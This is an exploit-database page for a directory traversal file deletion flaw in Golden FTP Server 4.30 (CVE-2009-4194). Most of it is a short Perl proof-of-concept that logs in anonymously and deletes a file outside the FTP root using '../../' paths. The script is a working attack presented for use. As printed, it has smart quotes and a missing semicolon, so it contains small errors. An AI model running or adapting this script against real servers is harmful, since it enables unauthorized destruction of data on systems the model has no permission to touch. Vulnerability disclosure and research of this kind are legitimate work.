Golden FTP Server 4.30 File Deletion Vulnerability



EDB-ID: 10258 CVE: 2009-4194 OSVDB-ID: 60631
Author: sharpe Published: 2009-12-01 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Software Link: [http://www.goldenftpserver.com/download.html]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
# Code : [http://blog.sat0ri.com/?p=292]

#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/

use strict;
use Net::FTP

my $ftp = Net::FTP->new(”192.168.1.35″, Debug => 1) || die $@;

$ftp->login(”anonymous”, ‘anonymous@local.host’) || die $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(”/public/”) || die $ftp->message;

# This deletes the file C:\bollocks.txt
$ftp->delete(”../../bollocks.txt”);

$ftp->quit;

$ftp = undef;